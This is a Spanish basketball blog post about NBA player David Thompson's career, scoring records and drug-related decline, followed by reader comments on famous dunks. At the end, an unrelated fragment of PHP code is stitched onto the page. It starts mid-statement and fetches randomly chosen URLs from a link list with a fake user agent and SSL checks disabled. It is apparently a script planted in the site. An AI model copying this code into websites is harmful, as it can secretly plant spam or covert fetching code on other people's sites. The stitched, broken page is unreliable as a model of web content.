¿Quién fue David Thompson?

17 de October de 2011 por txusma

La lista de los máximos anotadores en un partido NBA está repleta de nombres ilustres: Wilt Chamberlain, Kobe Bryant, Michael Jordan, Elgin Baylor, David Robinson, Pete Maravich, Larry Bird, Karl Malone… Pero entre todos ellos destaca en la cuarta posición absoluta David Thompson, de los Denver Nuggets. ¿Alquien recuerda a este jugador capaz de anotar 73 puntos en un partido frente los Pistons y que posee el récord de anotación en una parte (53)?

Para ponernos rápidamente en situación os diré que Michael Jordan ha explicado en varias ocasiones que David Thompson era el modelo en el que se fijaba cuando era joven. Y es que este escolta de 1’93 fue toda una estrella en North Carolina, la tierra donde creció ‘Air ‘ Jordan. En 1974 llevó a su universidad, Noth Carolina State, al primero de sus 2 títulos NCAA, rompiendo una fenomenal racha de 7 títulos consecutivos logrados por UCLA, equipo totalmente intratable en aquella época.

En aquellos años le empezaron a llamar ‘The Skywalker’ debido a su fenomenal capacidad de salto. Lamentablemente, no pudo utilizar su gran virtud para deleitarnos con grandes mates porque en su época estaba en vigor la ley ‘Lew Alcindor’ que prohibía machacar. Sólo lo hizo en una ocasión, en un partido frente UNC Charlotte de 1975, cuando el corazón se impuso a la cabeza y tras un veloz contraataque destrozó el aro rival. La canasta fue invalidada y a Thompson le señalaron una técnica. Uno de los jugadores más espectaculares que ha pasado por la universidad se pasó 3 años sin poder realizar la, posiblemente, acción más espectacular del baloncesto. Lo que se perdieron…

En aquellos 3 años promedió 26.8 puntos por partidos con un 55% de acierto en tiros de campo. David Thompson está considerado como unos de los mejores jugadores de la historia de la conferencia ACC al lado de auténticos mitos universitarios como Michael Jordan, Ralph Sampson, Len Bias, Tim Duncan o Christian Laettner. Su número (44) es el único que su universidad ha retirado en 100 años de historia.

Semejante paso por la universidad provocó que fuera elegido en el número 1 del draft tanto de la NBA (Atlanta Hawks) como de la ABA (Virginia Squires). Thompson consideró que los Hawks no estaban suficientemente interesados en él y acabó fichando por los Denver Nuggets de la ABA que habían adquirido sus derechos poco antes. El año que pasó en la ABA ha de ser ser considerado como inolvidable: se convirtió en el líder de su equipo al anotar 26 puntos por partido, llegó a la final (aunque perdió frente los New York Nets), fue nombrado MVP del All Star Game y fue el rival de Julius Erving en aquel mítico concurso que ‘Dr. J’ finiquitó machacando desde la línea de tiros libres. Evidentemente ganó el Rookie of the Year.

Al año siguiente NBA y ABA se fusionaron y los Denver Nuggets pasaron a formar parte de la NBA. ‘The Skywalker’ llegó, vió y venció. Durante 5 años demostró todas y cada una de sus virtudes, llegando a su punto ágido en 1978. Aquella temporada promedió 27’1 puntos, 4’9 rebotes, 4’1 asistencias, 1’2 robos y 1’2 tapones y nos obsequió a todos con un partido increíble el último día de liga regular. Thompson anotó 73 puntos en un esfuerzo desesperado por alzarse con el título de máximo anotador en dura pugna con otra leyenda como George Gervin. Anotó 32 puntos en el primer cuarto y 21 en el segundo para un total de 53 puntos en la primera parte (récord de la NBA) y a pesar de no jugar buena parte del resto del partido acabó con 73 puntos, en aquellos tiempos la tercera mejor marca de la historia detrás del inconmensurable Wilt Chamberlain. Desgraciadamente para él, no consiguió el título de máximo anotador por menos de una décima. ‘The Iceman’, aquel día, anotó 63 puntos. Después de aquella temporada, Thompson firmó un contrato récord de 4 millones de dólares anuales durante 5 años. Nunca nadie había ganado tanto dinero por jugar al baloncesto.

El jugador de los Nuggets estaba en el olimpo de la liga y parecía llamado a convertirse en toda una leyenda a la altura de lo que después fueron Michael Jordan, Larry Bird o Magic Johnson. Jugó los All Stars de 1977, 1978 y 1979, fue el MVP del All Stars de 1979 (único jugador capaz de ser MVP en All Stars de la ABA y la NBA), apareció en el mejor quinteto de la liga en 1977 y 1978… ¿Qué sucedió para que desapareciera prácticamente de un año para otro? Dicen que ‘The Skywalker’ empezó a coquetear con las drogas en la universidad y que tras firmar aquel increíble contrato y encontrarse en la cima del mundo, no fue capaz de sobrellevar toda la presión. El propietario de los Nuggets conocía el problema pero no lo hizo público al confiar que Thompson sería capaz de dejarlo. No lo hizo y en la temporada 1981-1982, envuelto ya en una espiral de adicciones, perdió la titularidad y el favor de la afición. Rápidamente, los Nuggets se lo sacaron de encima y lo traspasaron a los Sonics donde jugó un par de años muy lejos de sus posibilidades reales. De todas maneras, no fueron las drogas lo que provocaron su pronta retirada (aunque a lo mejor lo hubieran conseguido) sinó una grave lesión de rodilla que se causó al caer por unas escaleras durante una pelea a las puertas del mítico Studio 54 de New York. Intentó volver en 1985 con los Indiana Pacers pero le fue imposible, nuevamente a causa de las drogas.

Tras su retirada, continuó con sus graves problemas de alcohol y drogas hasta que la aparición de un pastor cristiano puso en orden su vida. Ahora se dedica a guiar a jóvenes jugadores y a evitar que cometan los mismos errores que comitió él.

En 1992 los Nuggets le retiraron el dorsal y en 1996 entró a formar parte del Hall of Fame.

La historia de David ‘The Skywalker’ Thompson es la historia del “Que hubiera pasado si…”. En los años que estuvo en plenitud de facultades demostró tener un nivel a altura de lo más grandes. Sin los problemas de drogas ni la grave lesión del 84, seguramente le habríamos visto varios años más por encima de los 25 puntos por partidos, apareciendo en más All Star y luchando sin tapujos por el MVP de la liga regular. Seguramente, no habría hecho falta dedicarle este artículo.

Comenta

15 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    No era muy estético su lanzamiento… pero pedazo de muelles, dioss

      Citar

  2. laker16 dice:
    #2

    Si no hubiera tenido los problemas que tuvo es probable que estuvieramos hablando de un Top 10 historico en su posicion, una lastima. Otro nombre que aparece en este articulo y que su caso aun fue mas dramatico es el de Len Bias. Ambos eran jugadores con carreras muy prometedoras.

      Citar

  3. laker16 dice:
    #3

    ¿Su manera de machacar no creeis que es algo parecida a la de LeBron?

      Citar

  4. laker16 dice:
    #4

    laker16: ¿Su manera de machacar no creeis que es algo parecida a la de LeBron?

    A mi me lo parece por como extienden el brazo al machacar

      Citar

  5. TheDeerHunter dice:
    #5

    Partiendo de la base que hay más de 10 cm de diferencia entre ellos cuesta vislumbrar la comparación.
    Lebron: http://www.youtube.com/watch?v=9-9TAoPPgKQ

    Ambos pegan unos saltos acojonantes y ambos parecen tener cierta preferencia por el mate a una mano. Parece que llaman más la atención los de Thompson por ser más bajo, pero claro, ya veríamos si aquel hubiera sido capaz de pegarles esos “on your face” a Duncan o Rasheed.
    Menudos brutos.

      Citar

  6. HisRoyalAirness dice:
    #6

    Aunque no venga a cuento, tras leer los comentarios sobre mates y “on your faces” he recordado una brutalidad; soy un acérrimo defensor de los 80 pero, de lo que yo he visto en riguroso directo,no puedo dejar de admirar la imagen de Dwayne Wade incrustándole la rodilla en el esternón a Varejao y destrozando el aro

    http://www.youtube.com/watch?v=5uRN7iJ5CqQ&feature=youtube_gdata_player

    Mira que me sangra cuando se dice que Miami es el equipo de Lebron.

      Citar

  7. laker16 dice:
    #7

    Que brutal este Wade!! A proposito de lo de LeBron y Miami, no creo que los Heat tengan que ser el equipo de nadie; ni de Wade ni de LeBron. Pienso que tienen que ser un equipo y punto, tienen 3 grandisimos jugadores que si ponen su talento a dispocion de los intereses de su equipo pueden hacer historia. Aunque ya son un equipo temible les falta algun retoque como podria ser un center de mayor nivel de los que disponen actualmente.

      Citar

  8. laker16 dice:
    #8

    Tambien queria decir que estoy de acuerdo en hoy por hoy Wade es el mayor icono de los Heat, siendo probablemente el mejor jugador su historia, al haber liderado al equipo a su primer campeonato con una actuacion antologica en las finales.

      Citar

  9. Txusma dice:
    #9

    A mi cuando se empieza a hablar de mates siempre me viene a la cabeza el mismo:

    http://www.youtube.com/watch?v=XMrPjl-927Q

    No es por menospreciar a Wade pero si en lugar de empujar a Varejao lo hubiera saltado por encima, hablaríamos de otra cosa 😉

      Citar

  10. laker16 dice:
    #10

    Para mi gusto este mate de Carter en los JJOO es simplemente el mejor que he visto, junto con algunos de los que hizo en el Slam Dunk Contest de ese mismo año. Este tipo de demostraciones lo convierten en mi opinion en un Top 3 de los mejores matadores de la historia. No me atrevo a decir el mejor de todos por que lo veo un juicio algo precipitado, pero…

      Citar

  11. Campo2 dice:
    #11

    Lo de Carter en el concurso de mates fue impresionante, me acuerdo que en la retransmision no se si fue Daimiel o Montes que dijeron que pobre de el que salia después de Carter que estaba haciendo unos grandisimos mates pero con lo que se acababa de ver en la pista era una miseria, No se si era Francis el desafortunado

      Citar

  12. TheDeerHunter dice:
    #12

    Me parece recordar que era Stackhouse.

    Los mates de Francis, como los de TMac fueron un pasote casi al nivel de los de Vince.

      Citar

  13. Txusma dice:
    #13

    Creo que ese concurso de mates marcó el punto álgido del evento. A partir de ahí la cuesta abajo por mucho Superman y mucha kryptonita que se precie.

      Citar

  14. laker16 dice:
    #14

    Estoy de acuerdo en que el nivel de estos concursos ha bajado en los ultimos años, aunque mas que en la ultima decada yo diria mejor en el ultimo lustro. Poco despues de Vinsanity llegaron los concursos de Jason Richardson que fueron de lo mejorcito que he visto, ya fuera mas por la actuacion individual de Richardson que por la competividad del evento.

      Citar

  15. HisRoyalAirness dice:
    #15

    El duelo de primos y de Raptors de Vince y T-Mac fue de lo mejor de los últimos años, un duelo a la altura de los mejores de la historia. Pero recuerdo que, siendo Jerry y T-Mac unos animales (con esa actuación habrían ganado cualquier año) los mates de Vinsanity eran asombrosos y los hacía con una facilidad insultante. Recuerdo que el comentario más recurrido de los comentaristas cuando hacía uno de los suyos era “ok, let’s go home”. Sin duda de los mejores que he visto.

    Es cierto Txus, hay mates más bestias pero es que a veces nos olvidamos de que Wade es casi 10 centímetros màs bajo que los saltimbanquis tipo Lebron, Iguodala o Vince (hay uno de este año que lo hace a 2 manos, previo reverso que es una locura)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>